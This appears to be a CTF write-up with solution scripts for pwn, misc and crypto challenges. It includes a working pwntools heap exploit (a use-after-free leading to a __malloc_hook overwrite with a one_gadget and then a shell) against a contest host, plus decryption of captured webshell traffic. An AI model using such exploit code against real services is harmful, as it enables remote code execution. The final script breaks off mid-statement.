Pwn
pwn1
- Run 函数有个条件竞争,可以泄露 libc;后面 libc 换成了 2.27,所以用条件竞争配合 UAF 把 fd 指针写到 __malloc_hook,然后改为 one_gadget 即可
from pwn import *
context.log_level = 'debug'  # echo every byte sent/received; useful when a menu prompt is missed
#p = process('./pwn1')        # local run against the challenge binary
p = remote('119.61.19.212',8087)  # contest instance used by this writeup
def sl(x):
    """Send `x` plus a newline on the challenge connection `p`."""
    p.sendline(x)
def ru(x):
    """Consume input from `p` up to and including the delimiter `x`."""
    p.recvuntil(x)
def se(x):
    """Send `x` on `p` as-is (no trailing newline, unlike sl())."""
    p.send(x)
def malloc(idx, cont):
    """Menu option 1: allocate slot `idx` and send `cont` as its content.

    Waits for the 'run' prompt first; `idx` is str()'d, so ints and strings
    are both accepted.
    """
    p.recvuntil('run\n')
    p.sendline('1')
    p.recvuntil('index:\n')
    p.sendline(str(idx))
    p.recvuntil('content:\n')
    p.sendline(cont)
def free(idx):
    """Menu option 2: free slot `idx` (sent as a decimal string)."""
    p.recvuntil('run\n')
    p.sendline('2')
    p.recvuntil('index:\n')
    p.sendline(str(idx))
def run(idx, cont):
    """Menu option 3 ("run"): select slot `idx`, then send `cont` as the key.

    The key is sent raw (no newline), matching the original se() call.
    """
    p.recvuntil('run\n')
    p.sendline('3')
    p.recvuntil('index:\n')
    p.sendline(str(idx))
    p.recvuntil('key:\n')
    p.send(cont)
# Fill nine slots so there is something to free and re-allocate below.
malloc(0,'aaa') #0
malloc(1,'bbb') #1
malloc(2,'ccc') #2
malloc(3,'ddd') #3
malloc(4,'eee') #4
malloc(5,'fff') #5
malloc(6,'666')
malloc(7,'777')
malloc(8,'888')
# Free slots 1..7 (free() str()s its argument, so str(i) is redundant here).
for i in range(1,8):
    free(str(i))
# Option 3 on slot 0 with an 8-byte key, then free slot 0.
run(0,'a'*8)
free(0)
# After the next prompt the program sends 6 raw bytes; pad to 8 and unpack as a pointer.
ru('run\n')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
# 96 / 0x3ebc40 / 0x4f322 / 0x3ebc30 are offsets into the libc 2.27 build named
# in the writeup; they do not carry over to another build.
libc_base = leak_libc - 96 - 0x3ebc40
info('libc base : 0x%x'%libc_base)
one_gadget = libc_base + 0x4f322
malloc_hook = libc_base + 0x3ebc30
# Same exchange as malloc(1, '1'), minus the wait for 'run\n' that ru() above already consumed.
sl('1')
ru('index:\n')
sl('1')
ru('content:\n')
sl('1')
for i in range(2):
    malloc('1','1')
# Second leak, same pattern as the first: run + free, then 6 bytes after the prompt.
run(1,'a')
free(1)
ru('run\n')
leak_heap = u64(p.recv(6).ljust(8,'\x00'))
info('leak heap : 0x%x'%leak_heap)
# malloc(2, '2') again without the prompt wait.
sl('1')
ru('index:\n')
sl('2')
ru('content:\n')
sl('2')
info('malloc hook : 0x%x'%malloc_hook)
# Key sent is the decimal string of malloc_hook XOR leak_heap (run() sends it without a newline).
run(2,str(malloc_hook^leak_heap))
free(2)
# Pause before the next allocations; presumably gives the race from the writeup time to land — confirm.
sleep(2)
malloc(5,'a')
malloc(6,p64(one_gadget))
# One more option-1 request for slot 0, then hand the session to the user.
ru('run\n')
sl('1')
ru('index:\n')
sl('0')
#gdb.attach(p)
p.interactive()
Misc
完美的错误
- 题目描述去除混淆的编码,于是联想到base58,又说错位,所以改一下字符集顺序爆破
# Base58 alphabet (Bitcoin's: 0, O, I and l are left out).  The __main__
# block below rebinds this name on every pass, so the encoder and decoder
# read it at call time rather than capturing it.
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)  # 58
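def b58encode(v):
    """Encode *v*, a byte string, to base58 using the module's ``__b58chars``.

    Runs on both Python 2 (``str``) and Python 3 (``bytes``): the hex
    conversion goes through ``binascii`` instead of the Python-2-only
    ``hex_codec`` codec.  Leading zero bytes become leading ``__b58chars[0]``
    characters (Bitcoin's leading-zero compression).  Returns ``''`` for
    empty input, where the original raised ValueError from ``int('', 16)``.
    """
    import binascii

    if not v:
        return ''
    long_value = int(binascii.hexlify(v), 16)
    digits = []  # least-significant digit first; reversed at the end
    while long_value >= __b58base:
        long_value, mod = divmod(long_value, __b58base)
        digits.append(__b58chars[mod])
    digits.append(__b58chars[long_value])
    # lstrip(b'\0') works on py2 str and py3 bytes alike.
    n_pad = len(v) - len(v.lstrip(b'\0'))
    return __b58chars[0] * n_pad + ''.join(reversed(digits))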
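def b58decode(v):
    """Decode base58 text *v* into a string of bytes (``str`` on Python 2).

    Leading ``__b58chars[0]`` characters decode to leading NUL bytes.
    Raises ValueError for a character outside ``__b58chars``; the original
    silently folded ``str.find``'s -1 into the value.  The ``0L`` literal
    of the original is a SyntaxError on Python 3; a plain ``0`` behaves the
    same on Python 2.
    """
    long_value = 0
    for ch in v:
        digit = __b58chars.find(ch)
        if digit < 0:
            raise ValueError("invalid base58 character: %r" % (ch,))
        long_value = long_value * __b58base + digit  # Horner form of sum(d_i * base**i)
    out = []  # least-significant byte first; reversed at the end
    while long_value >= 256:
        long_value, mod = divmod(long_value, 256)
        out.append(chr(mod))
    out.append(chr(long_value))
    n_pad = len(v) - len(v.lstrip(__b58chars[0]))
    return chr(0) * n_pad + ''.join(reversed(out))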
def pailie(a):
    """Rotate the string *a* left by one place: its first character moves to the end."""
    first = a[0]
    return a[1:] + first
if __name__ == "__main__":
    # Try every rotation of the alphabet: each pass moves its first symbol
    # to the end, and after 58 passes the table is back where it started.
    # The decode is printed for every rotation; the right one is read off by eye.
    for i in range(58):
        __b58chars = pailie(__b58chars)
        #print b58encode("hello world")
        print b58decode("RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX")
撸啊撸
- 题目是个图片,拿到以后发现文件头多了点东西,猜测是文件修复
- 谷歌搜了一下__PAGEZERO,发现是Mach-O文件格式,具体可以看https://amywushu.github.io/2017/02/21/基础知识-解读-Mach-O-文件格式.html,于是修复文件头,把0xffffffff改为0xcffaedfe,然后ida打开看,写个异或脚本
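# Each character of the string recovered from the binary was XORed with 1; undo it.
a = '938gce1`872db99db`b342d23c0g9g2d'
flag = ''.join(chr(ord(ch) ^ 1) for ch in a)
# print() with a single argument prints the same on Python 2 and 3.
print('flag{' + flag + '}')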
脑筋急转弯
- 拿到一个wav文件,猜测是wav隐写,最后用silenteye得到一个压缩包,爆破得到密码654321,然后打开压缩包有个txt
- 把012换成.!?,然后ook,brainfuck解码
抓灰阔
- 一个流量包,仔细找传输的文件,发现main.jsp,再上网找资料,发现是冰蝎一句话木马,所以目前key和加密的payload有了,逐一解密payload
from Crypto.Cipher import AES
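import base64

# Key and mode taken from the captured webshell traffic (per the writeup);
# ECB is what that client used, not a choice made here.
key = b'ba4ae3277932b0a2'
decipher = AES.new(key, AES.MODE_ECB)
with open('./data/flag.enc', 'rb') as f:
    data = f.read()
# The captured payload is base64 text around the raw AES blocks; b64decode
# skips stray whitespace the way str.decode('base64') did on Python 2.
msg = base64.b64decode(data)
b = decipher.decrypt(msg)  # decrypt once; the original ran it twice
print(b)
# `with` closes the output file; the original left it open.
with open('./data/flag_dec.class', 'wb+') as f:
    f.write(b)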
- 本来想逐一反编译class为java文件,突然发现参数是写在class文件中的,然后找到一个串加密的payload中有上传一个flag文件
- 于是把content的内容拿去base64解码后写入文件中,发现是elf文件,但是格式不对,根据https://blog.csdn.net/xuehuafeiwu123/article/details/72963229把第五字节到七字节修正,然后elf打开
写脚本解密
Crypto
强大的hash
- 给了个 hash,需要我们写脚本爆破,这里有个坑点是 hash 的类型是 $argon2d,php 不支持这种类型
from argon2 import PasswordHasher
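from itertools import product

# Candidate digit groups for the two blanks in CTF_<a>_<b>.
# (Renamed from `list` / `hash`, which shadowed the builtins.)
candidates = ["114","119","110","120","121","122","170","189","180","133","144","911"]
ph = PasswordHasher()
target_hash = "$argon2d$v=19$m=32768,t=100,p=1$MTIzNDU2Nzg$iuSRO5tkWxBxqgkI5g9O5ZersA//xvgvrKxH8QuxBBI4yKbG4aRFqITP/Rh5giFRuL9PTJP+/0BUfNwZHzx9bQ"
for first, second in product(candidates, repeat=2):
    char = 'CTF_' + first + '_' + second
    print(char)
    try:
        # argon2-cffi's verify() raises on a wrong password instead of
        # returning False, so a miss lands in the except below.  Note this
        # also hides any other error (e.g. a malformed hash string).
        if ph.verify(target_hash, char):
            print('done : ' + char)
            raise SystemExit(0)  # not caught by `except Exception`
    except Exception:
        pass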
遗失的秘密
- 见到过类似的题目https://www.40huo.cn/blog/rsa-private-key-recovery-and-oaep.html,先把n补全,然后改一改脚本的值,就能跑出flag
#!/usr/bin/python
#-*- coding:utf-8 -*-
import re
import pickle
from itertools import product
from libnum import invmod, gcd
def solve_linear(a, b, mod):
    """Return x with a*x == b (mod `mod`), or None when a or b is even.

    `mod` must be a power of two: the reduction uses `& (mod - 1)` rather
    than `%`, and an odd `a` is what guarantees the inverse exists.
    """
    both_odd = (a & 1) and (b & 1)
    if not both_odd:
        return None
    inverse = invmod(a, mod)
    return (b * inverse) & (mod - 1)
def to_n(s):
    """Parse a colon/whitespace-separated lowercase hex dump (openssl style) into an int."""
    keep = set("0123456789abcdef")
    hex_digits = "".join(ch for ch in s if ch in keep)
    return int(hex_digits, 16)
def msk(s):
    """Turn a partially-known colon-separated hex dump into (ranges, mask, value).

    Each colon-separated field contributes its last two characters, so a
    field of spaces keeps spaces (unknown nibbles) and "ab" stays "ab".
    """
    fields = s.split(":")
    cleaned = "".join(field[-2:] for field in fields)
    return (msk_ranges(cleaned), msk_mask(cleaned), msk_val(cleaned))
def msk_ranges(s):
    """Per-nibble candidates: all 16 values for a space, else the one fixed hex digit."""
    out = []
    for c in s:
        if c == " ":
            out.append(range(16))
        else:
            out.append([int(c, 16)])
    return out
def msk_mask(s):
    """Mask with 0xf at every known nibble position and 0 at each unknown (space)."""
    nibbles = ["0" if c == " " else "f" for c in s]
    return int("".join(nibbles), 16)
def msk_val(s):
    """Value of the known nibbles, with every unknown (space) position read as 0."""
    return int(s.replace(" ", "0"), 16)
E = 65537
# Modulus as printed by an `openssl ... -text` dump (colon-separated hex).
# Its final byte is absent here; the loop at the bottom of the script
# appends each candidate byte before parsing.
N_ = """00:c4:9d:36:a4:77:76:12:12:85:24:6c:74:1d:7d:
b3:ce:f4:c3:a4:69:cd:0b:2e:8f:d6:75:e3:80:b8:
e8:1c:ce:e8:60:90:45:56:73:ab:32:32:00:7f:6a:
76:3e:b6:10:d3:a2:74:da:f9:4e:a5:7e:ae:ef:f4:
da:82:57:6d:68:82:50:d8:b1:fc:92:b1:5c:7d:54:
f5:7e:d0:06:8a:60:ff:82:70:72:20:68:4b:71:ba:
87:44:57:c1:97:a0:8a:2d:53:93:f3:0a:60:87:a3:
85:c8:45:e6:0a:88:85:b5:ff:c7:09:9a:76:03:fe:
99:b6:fb:8a:1e:9f:a8:42:3a:0a:c9:a9:bf:1c:87:
2c:c4:99:10:db:46:e3:a9:a5:79:93:8c:75:71:ec:
c6:3b:af:44:dc:60:c4:53:f6:3c:e8:73:2f:50:10:
38:e7:6f:d0:a5:4b:ae:e3:1e:43:11:42:2c:a2:38:
e6:3f:0b:13:54:63:e8:2f:9e:61:ab:08:65:97:e0:
27:30:19:fd:a7:fe:5c:d8:11:b8:34:87:ad:02:c2:
bc:cd:73:d3:86:be:fd:2a:b4:fe:7d:7e:d3:64:bb:
6f:63:ed:a6:1d:ee:f2:80:da:9d:7a:23:7f:c1:39:
b0:98:0c:85:8f:d0:4b:9f:e4:1a:26:fc:44:d1:67:
03:32:03:0c:91:61:23:4c:81:6f:42:18:88:41:dc:
27:55:a3:07:7c:a1:ad:f3:58:4d:91:07:65:f1:63:
f2:34:d5:17:0e:59:c6:bb:b6:6d:7d:0c:d2:64:4b:
b9:9c:52:59:03:8e:2a:43:23:76:33:c3:e8:72:3b:
1c:e0:40:97:36:5f:ae:00:d7:e3:09:eb:df:55:44:
22:b4:09:00:b5:09:41:70:6c:5c:3b:98:d3:34:7e:
60:a2:b8:93:bd:af:32:77:48:48:8a:a5:9c:0e:6a:
a1:79:36:86:8c:e9:3f:b1:a2:a7:4a:3a:d8:d6:f6:
dd:62:d8:ae:9e:13:bb:0c:6b:b1:65:68:0d:7e:58:
3f:68:1e:91:49:13:19:68:2b:fd:3c:5e:52:fa:76:
b0:57:fc:0e:35:d8:71:56:41:06:ef:50:99:56:dd:
d4:9a:1f:d3:46:26:12:9c:15:4b:43:fc:1b:de:c9:
06:ad:82:56:63:c8:a4:83:32:d2:35:05:23:15:52:
d9:0a:73:85:5e:c9:c2:56:af:69:d2:5f:77:04:28:
c8:4c:b9:a6:d4:15:15:b5:15:99:13:ef:a9:a5:de:
5a:74:b1:03:cf:32:a5:03:69:f8:e9:bb:7e:16:31:
5e:43:e7:02:51:ac:c5:f6:bf:ef:1c:74:f7:13:0c:
19:ad:"""
# Each msk("...") below is the partially readable dump of one private-key
# component: a space stands for an unknown nibble.  msk() yields the
# per-nibble candidate ranges (only used for p), a mask of the known
# nibbles and their value, which search() compares candidates against.
# Prime p: the candidate ranges drive the digit-by-digit lift.
p_ranges, pmask_msk, pmask_val = msk("""00: :05:89: :bd:35: : :23: : : : :84:
: :ed: :70:14: : : :10: : :87: :51:
ea: :97:69: :52: : : : : :ea: : :15:
: :34: :be:11:23: : :34:14: :94: :10:
: :74:87:37:ee:81:62:ee:95: : :dc:49:dd:
: :35: :81: :fa: : : :86: : : :fb:
:93: : :12: :14: :ab:76: :96: : :27:
:21: :04:01:41: :98: :ff: : :12:dc: :
cd: :39:95:30: :47: :fa:ff: :34: :ad: :
:52:02:fa:bc:14:22:22:48:61:62:bd:53: : :
72:08:cb:41:88: : : :63:91:30:fe: : :42:
87: :18:52: :39:dd: :68: :fe:06:88:81: :
: : :ae:fd: : :fb:21:37:59: :53: :fa:
:07:40:eb:33:77:51:64:10:dd: :73: :86:62:
:bf: :79: :34: :bb: :44:ff: :46:fe:90:
ef: :52:ad: : :fe: :69:18:89:bd:cd:09:46:
: :74:71: : : :41:66: : :11: :25: :
39:8b""")
# Prime q: only the mask/value pair is used (q is derived from p and N).
q_ranges, qmask_msk, qmask_val = msk("""00:ce:43:ef: :76:58:17:43:31: : :32:70: :
89: : :36:55:06: :79:66:78: : : : : :
:85: : : : : :33:bb: : :56: :66:cb:
:08: : :90:cb: : :24:fa:ca:47: : : :
:88: :83:01: :62: : : : : : :ad:ae:
: : :58: :ec: : : :09:04:86: :05:00:
:df:50:84:81:80: :ae: :24: :94:da: :04:
ce: :ef: : :ed:be:bf:43:78: : :05:93: :
08:52:05: : : : :ae: : : : :ab: : :
:76:ce: : : : :19:bd:22: :ef:dc:bf:ea:
ab:78:01: : :85: : : :ea: : :fb: : :
92:66:19: : :ab: : :82: : :31: : :da:
82: :13:82:43: : :94:13:41: : : :37: :
:04:56:02:87:dd: :58:27: : :24: : : :
28: : :09:14:89: : : :49:59: :16:eb:65:
:01:22: : :dd: :78: : :db:90: :ac: :
:fd: :03:74: : : : :92: :00:ba: : :
:05""")
# Private exponent d (check_level >= 2).
_, dmask_msk, dmask_val = msk("""11: : :69:62:64: : : : :15: :13:de:de:
cf: : :17: : :75: :98:42:fc: :12:15:08:
: : : : :36: :be:25:48: : :19: : :
:47:11:19: :03: :49:fc:da: :96:45:eb: :
: : :91: :ea: : :55:ff: :37:58: : :
19: : :73:40: :91:15:01:da:91:22:fd:32: :
: :50: : :66: : : :42: : :ef: : :
df:42: :97:30: :39: : : : : : :dc: :
: : : : :38: : : :88:28: :05: : :
78:59:fa: :86: :19:24: : : : :da:cf:15:
39: : : : :ef:55: :ce:47: :58:89: :fb:
:24: : : :92: : :ee: : :db:67:31:ce:
:28: :72:ec:89: :04: : :50: : : : :
:37: :44: : : : :56: :38: :bb:47:bb:
66:83:99:22:07:72: : :48:52:02: : : :29:
:82:56: :67: :95: : :56:94: : :71: :
bf:27:98: : :54:98:26:06:87: :ae: :53:be:
: :80:37:60:61:ea:ef:de: : :df:90:81: :
70: :06:33:26: :75:fe:95: :92: :78:cd:05:
64:cc:68: : :36:54: :bd:16:90:ee:60: : :
: :41: : :91: :79:58:06:50: :46: : :
45: :09:ca:ac:16: :27:98: : :ba:82: :77:
93:98:ad: :15: :67:53:97:ad:ee:50:44: :31:
07: :ff:01: :09: : : : : :46: : :42:
15: :db:df:42:be: : : :78: :41: : : :
:14: : :25:fc: :84: : : : : : :20:
da:46:01:eb:87: :12:57: : :56:af: :87:93:
60: :02: :18:89:63:72:ad: :ed:cf: : :84:
:22: :13: : :dd: :ff: : : :de:62:37:
:19:66: : :86:02: :38: : : : :ec:14:
12: :43:93:19:65:98: : :03: : : :ef: :
: :ca:07:92:22: : :bb:15:eb: : : :35:
:72:29:cd: : :99: : : : :41:06: : :
:43:33: :32: : :54:be:92:62: :78:59:42:
79:89""")
# CRT exponent dp = d mod (p-1) (check_level >= 3).
_, dpmask_msk, dpmask_val = msk(""" :39: :28:16:02:89:ce:11:fe: : : : :af:
: : :ed:97: : :11:20:ba:ae:98:ad: : :
:10:87:ac:07: : : : :50: : :70:50:52:
df:89:eb:02: : : : :93:11: : :12: :56:
:08: : :ea: :10:fa:19: : : :54:45:07:
: :bc:ff:33: :db:63:49:fe:52: :33: : :
bf:cd:45:91: :10: : :92:81:40:03: :80: :
29: :30: :ed:43:64:ca: :bf:64: : :bf: :
: : :24:72:84: : :ff: : :24: :81:27:
db:23: :64: :67: :ba: : :bc: : : : :
:ae:88: : : : : :91: : :14: :ba:ef:
:89: : : : : : : : :05: :75:52: :
: : :be:ad:df: :02:88:00: : :15:45: :
cf:32: :ca: :93: :32: :40: :27:dd: :19:
73:dc: : : : : :cf: : :dd: : :ca: :
ee: :ca: : : :49: :27: :58:53: :64:25:
:22:06:16:ff:62:bc: : : : :24:fc: : :
df""")
# CRT exponent dq = d mod (q-1) (check_level >= 4).
_, dqmask_msk, dqmask_val = msk("""02: :bd: :19:25:98:75: :65: :55:28:33:bc:
34:84:91:01:96: : :08: :32:45: :27: : :
:fe: :bb:63:32:68: :51:bd:75:40: :52:52:
: : :78:85:fc:94: :07: :14: : : : :
15:dd: : :93: :01: : :77:ca: :40: :da:
:89:bc:87:62:dc:ac:61:88: : :70: :69: :
:36: : :21:08: :dc:73: :ad:da:ee:fe: :
96: :58: : :46: :29:ff:97:ce: : : :cb:
51: : :81: :22: : :19: :10:69:41:36:ca:
:22:49: :cc:cf:06: : :08: :76: : :45:
98: : :45: : : :69:13:65: : :da:54: :
19: :ee:24: :73: : : : : : :18:53:40:
21:25: : :84:52:cd: :49:33:78: : :ed: :
25:27: : : :ca: : : :ca: : :bc: :02:
31:70: :10:ca:84:59: : : :52: :27:76: :
47: :66:bf:ff: :03: :99:ff: :df: : : :
:46:27:45: :65:07: :48:da:dc: :80: : :
f9""")
def search(K, Kp, Kq, check_level, break_step):
    """Lift p one hex digit at a time, pruning with the known nibbles of the dump.

    At step s the low 4*s bits of p are fixed.  For each candidate, q is
    derived from p*q == N (mod 2^(4s)); with check_level >= 2 the private
    exponent is derived as (1 + K*phi)/E, and with 3 / 4 the CRT exponents
    from Kp and Kq; each derived value is compared against its mask.
    Returns False as soon as no candidate survives a step (the caller then
    tries the next K/Kp/Kq), True after `break_step` steps.  When
    p*q == N the key is printed and the process quit()s.
    Reads module globals N, E, p_ranges and the *mask_msk/*mask_val pairs.
    All callers pass check_level >= 2; with check_level 0, qval would be
    unbound at the final comparison.
    """
    max_step = 0  # only read by the commented-out progress print below
    cands = [0]
    for step in range(1, break_step + 1):
        #print " ", step, "( max =", max_step, ")"
        max_step = max(step, max_step)
        mod = 1 << (4 * step)
        mask = mod - 1
        cands_next = []
        # p_ranges is most-significant nibble first; [-step] is the nibble fixed now.
        for p, new_digit in product(cands, p_ranges[-step]):
            pval = (new_digit << ((step - 1) * 4)) | p
            if check_level >= 1:
                # q == N * p^-1 (mod 2^(4s)); None when pval is even.
                qval = solve_linear(pval, N & mask, mod)
                if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
                    continue
            if check_level >= 2:
                # N - p - q + 1 == (p-1)(q-1), so this is d mod 2^(4s) for multiplier K.
                val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
                if val is None or not check_val(val, mask, dmask_msk, dmask_val):
                    continue
            if check_level >= 3:
                val = solve_linear(E, 1 + Kp * (pval - 1), mod)
                if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
                    continue
            if check_level >= 4:
                val = solve_linear(E, 1 + Kq * (qval - 1), mod)
                if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
                    continue
            if pval * qval == N:
                print "Kq =", Kq
                print "pwned"
                print "p =", pval
                print "q =", qval
                p = pval  # shadows the loop variable; harmless since quit() follows
                q = qval
                d = invmod(E, (p - 1) * (q - 1))
                coef = invmod(p, q)
                from Crypto.PublicKey import RSA
                print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
                quit()
            cands_next.append(pval)
        if not cands_next:
            return False
        cands = cands_next
    return True
def check_val(val, mask, mask_msk, mask_val):
    """True when `val` matches the known nibbles (`mask_msk`/`mask_val`) within `mask`.

    Bits of `val` outside the known positions are ignored; `mask` limits the
    comparison to the low bits fixed so far.
    """
    return (val & mask_msk & mask) == (mask_val & mask)
# K = 4695
# Kp = 15700
# Kq = 5155
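# Brute-force the missing last byte of N, then the multipliers K, Kp, Kq in
# turn.  search() quit()s on a full factorization, so control only reaches
# the next candidate when the current one fails.
for i in range(0x100):  # was range(0xff), which never tried a last byte of 0xff
    # '%02x' % i is the two-digit lowercase form hex(i)[2:].rjust(2, '0') produced.
    N = to_n(N_ + '%02x' % i)
    print "index : ",i
    for K in range(1, E):
        if search(K, 0, 0, check_level=2, break_step=20):
            print "K =", K
            break
    for Kp in range(1, E):
        if search(K, Kp, 0, check_level=3, break_step=30):
            print "Kp =", Kp
            break
    for Kq in range(1, E):
        if search(K, Kp, Kq, check_level=4, break_step=9999):
            print "Kq =", Kq
            break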
#!/usr/bin/python
# coding=utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import gmpy2
# Prime factors of the modulus; presumably the output of the recovery
# script above — confirm.
p = 30804877236372761296348297513767908130120426767441642194038947059431749919743933282721728129660558520306627781991434638545287122418576024822599938752655436891429241798416041881441469038271460545196755187872022209260074336340748692939443634393492611052850561312058115000234467417922716845989845380178291512893577636848676778152648705150749219629638913963012345388388992649857974643758097581431795569765569985118215469798809551704275008726932734117893757436777110974529289423114881289423038562352073193732977840168067817149865622380253870276206212656648830136975036452877460473463818007722056777837507566352911184181643
q = 26038591288856688238001759665609016744197175469090080494077820415283745172609947555684568450035539489682168553390403854805974969118763740560638548072896648612347287461822059996717273680094814363090434263883250281614203478279438635312321752371517752177819983938115532573238089291708699056464231184039223531822571471611431921747169774540943776543504663419138030516108434288911593973010680364553026970545232818747951718950151516127319881685156986937644295056292836729469548074713781625918117631575942194589642230959265894967721587381648790905383499092379075578245308113268969812469233669312409066969648987454629639842309
N = p*q
e = 65537
#print N
#print e
phin = (p-1)*(q-1)
d = gmpy2.invert(e, phin)  # private exponent e^-1 mod phi(N)
# The OAEP path below was left unused; the ciphertext is treated as a raw
# RSA integer and decrypted with a bare modular exponentiation.
# with open('private.pem', 'r') as f:
# private = RSA.importKey(f)
# oaep = PKCS1_OAEP.new(private)
with open('flag.txt.en', 'rb') as f:
    data_enc = int(f.read().encode('hex'),16)  # Python 2 only: str.encode('hex')
plain = gmpy2.powmod(data_enc, d, N)
plain = hex(plain)[2:]
# hex() drops a leading zero nibble; re-pad so the string decodes to whole bytes.
if len(plain) % 2 != 0:
    plain = '0' + plain
print plain.decode('hex')
美好的回忆
利用第二段爆破出 key,然后解密
#coding:utf-8
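raw = "ood time"
two = [0xCD, 0xD9, 0x3B, 0x0A, 0xCF, 0xAA, 0x2A, 0x1E]
iv = [0x55, 0xE5, 0x9E, 0x0E, 0x27, 0x8A, 0x34, 0x63]
# With a known plaintext block, its ciphertext block and the IV, each key
# byte is ciphertext ^ iv ^ plaintext; the original brute-forced j over
# 0..255 per position, which yields exactly the same single value.
key = [ord(ch) for ch in raw]
t_key = [two[i] ^ iv[i] ^ key[i] for i in range(8)]
print(t_key)
# bytearray indexing yields ints on both Python 2 and 3, so no ord() is
# needed on the file bytes; `with` closes the file the original left open.
with open('flag.txt.encrypted', 'rb') as f:
    raw_iv = bytearray(f.read(8))
    flag = ''
    for _ in range(7):
        enc = bytearray(f.read(8))
        for i in range(8):
            flag += chr(raw_iv[i] ^ t_key[i] ^ enc[i])
        raw_iv = enc  # CBC-style chaining: previous ciphertext block feeds the next
print(flag)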
悲伤的结局
- 爆破最后的 padding,其他和上一题一样
#coding:utf-8
# print 19 ^ 24 ^ 1
# exit()
raw ="keep away from xiaocui!"  # presumably the known plaintext tail of the message — confirm
# raw = "have a good time.flag{21cb8c804abb60be5c9befcc928ccf5b}"
BLOCK_SIZE =8  # block length used by pad() and by the 8-byte iv/two lists below
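def pad(data, block_size=None):
    """PKCS#7-style padding: append n bytes of value n, n = block_size - len(data) % block_size.

    `block_size` defaults to the module's BLOCK_SIZE.  A full block of
    padding is added when `data` is already aligned.  On Python 3 the
    padding is encoded to bytes only when `data` is bytes; the original
    always called .encode(), which made str input fail with TypeError there
    (on Python 2 str.encode() returned str, so it was harmless).
    """
    if block_size is None:
        block_size = BLOCK_SIZE
    padding_len = block_size - len(data) % block_size
    padding = chr(padding_len) * padding_len
    if isinstance(data, bytes) and not isinstance(data, str):
        # Python 3 bytes input (on Python 2, bytes is str, so this never fires).
        padding = padding.encode()
    return data + padding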
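# Eight candidate positions for the last block; try each in turn.
# NOTE(review): this copy of the script lost its indentation.  The loop
# body below is reconstructed; whether the trailing exit() sat inside the
# loop (stopping after the first candidate) could not be recovered —
# confirm against the author's copy.
# Live (iv, two) pair: the last assignment in the original.  Its earlier
# attempts are kept below as comments; the bare list literals that followed
# them were expression statements with no runtime effect.
iv = [0xF7, 0x84, 0x4B, 0xE5, 0x61, 0x93, 0x7B, 0x98]
two = [0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
# iv = [0x15,0xEC,0x98,0x1C,0x6E,0xCD,0x6A,0x35]
# two = [0xDB, 0xDD, 0x3C, 0x5E, 0x91, 0xE7, 0x20, 0x1F]
# two = [0x14, 0xED, 0x9E, 0x1C, 0x38, 0xCC, 0x2E, 0x0D]
# two = [0xF7,0x84,0x4B,0xE5,0x61,0x93,0x7B,0x98]
# iv =[0x0A,0x23,0x86,0xED,0xB9,0xFF,0x9D,0x81]
# two = [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
# two = [0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
#[247, 83, 193, 36, 156, 73, 115, 24]
# two = [0xEB,0xB6,0x57,0x30,0xAC,0x8D,0x55,0x1D]
# iv = [0x14,0xED,0x9E,0x1C,0x38,0xCC,0x2E,0x0D]
# [0xE5, 0x20, 0xD1, 0x51, 0x08, 0xDB, 0x11, 0xF3]
# [0x56, 0x04, 0xEB, 0xA1, 0xDA, 0xB7, 0xFD, 0xF7]
# [0xFD, 0xA7, 0x71, 0xBC, 0x13, 0x9E, 0x13, 0xBC]
# [0x4C, 0x08, 0xAE, 0xA6, 0x92, 0xBC, 0xFC, 0xA3]
# [0xB1, 0xBA, 0x66, 0xBA, 0x5F, 0x89, 0x5C, 0xA1]
# [0x02, 0x5C, 0xA8, 0xBB, 0x9B, 0xAC, 0xAE, 0xEA]
# [0xB7, 0xFF, 0x73, 0xA0, 0x4E, 0x93, 0x02, 0xA1]
# [0x08, 0x4C, 0xBD, 0xE9, 0x86, 0xB1, 0xA2, 0xBE]
# [0xBD, 0xEF, 0x6E, 0xF2, 0x07, 0x98, 0x5B, 0xB0]
# [0x13, 0x07, 0xDE, 0xCC, 0xCE, 0xBD, 0xB8, 0xB3]
# [0xE2, 0xE1, 0x05, 0xD6, 0x4F, 0x85, 0x50, 0xBD]
# [0x46, 0x07, 0xD4, 0xD6, 0x9D, 0xBA, 0xFC, 0xF6]
# [0xF8, 0xAE, 0x00, 0xCC, 0x49, 0x9B, 0x19, 0xB3]
# [0x2F, 0x0E, 0xD6, 0xC4, 0x8F, 0xAC, 0xA9, 0xBD]
# [0xCA, 0xFA, 0x0A, 0x9C, 0x4B, 0xD5, 0x4B, 0xE1]
# [0x22, 0x0A, 0x88, 0xCD, 0x88, 0xAD, 0xAE, 0xBC]
# [0x9B, 0xFF, 0x0B, 0xC7, 0x19, 0xD9, 0x48, 0xE6]
# [0x70, 0x0C, 0x80, 0xCD, 0x81, 0xA6, 0xB5, 0x87]
# [0xFE, 0xA5, 0x1A, 0xFD, 0x4F, 0x9F, 0x5B, 0x8B]
# [0x0F, 0x30, 0xCF, 0xB4, 0xBD, 0xBA, 0xB6, 0x90]
# [0xBE, 0x93, 0x59, 0x8E, 0x73, 0xD6, 0x78, 0x9A]
# [0x0A, 0x23, 0x86, 0xED, 0xB9, 0xFF, 0x9D, 0x81]
# [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
for i in range(8):
    print('--------------------')
    n = i + 1
    raw_last = raw[-n-8:-n]
    print(raw_last)
    raw_last = pad(raw_last)
    print(raw_last)
    # Known plaintext ^ ciphertext ^ iv gives each key byte directly; the
    # original brute-forced j over 0..255 per position to the same value.
    # Only the first eight bytes of the padded block are used, as before.
    key = [ord(ch) for ch in raw_last]
    t_key = [two[k] ^ iv[k] ^ key[k] for k in range(8)]
    print(t_key)
    # bytearray indexing yields ints on Python 2 and 3; `with` closes the file.
    with open('flag.txt.encrypted', 'rb') as f:
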